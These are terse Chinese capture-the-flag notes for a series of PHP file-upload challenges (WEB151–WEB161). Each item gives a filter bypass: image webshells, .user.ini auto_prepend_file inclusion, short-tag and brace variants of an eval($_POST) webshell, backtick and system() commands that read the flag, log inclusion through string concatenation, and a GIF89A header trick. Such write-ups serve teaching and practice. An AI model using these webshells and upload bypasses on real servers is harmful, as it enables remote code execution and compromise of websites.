- WEB151
抓包改个名字即可
- WEB152
同上,随便传个图片马
- WEB153
考点是.user.ini
注意上传图片目录下有个index.php 即/upload/index.php
首先上传一个1.png图片马
上传auto_prepend_file = 1.png 的.user.ini
这样.user.ini所在目录会全部的文件包含1.png
- WEB154
同上过滤了php
一句话木马可以写成:<?= ?>等价于echo
- WEB155
同上
- WEB156
同上
过滤了[] 可以用{}
<?=eval($_POST{attack});?>
- WEB157
继续过滤了{}和;
那就直接不用一句话木马,直接system(‘cat flag.ph*‘)
- WEB 158/159
同上,用<?= `cat ../f*`?>
- WEB160
过滤了括号和反引号,所以不好上传指令
所以用.user.ini 包含图片
图片包含日志
<?=include"/var/lo"."g/nginx/access.lo"."g"?>
这里不能.user.ini直接包含日志,原因上面说了
另外这里过滤了log所以要拼接一下
- WEB161
对文件头检测,
GIF89A用来绕过检测